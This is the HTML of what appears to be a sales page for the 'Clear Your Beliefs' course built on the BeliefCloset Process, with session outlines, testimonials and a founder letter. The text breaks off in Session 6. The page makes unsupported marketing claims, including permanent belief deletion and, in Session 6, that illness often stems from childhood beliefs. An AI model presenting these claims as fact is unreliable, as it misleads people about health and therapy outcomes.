your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your 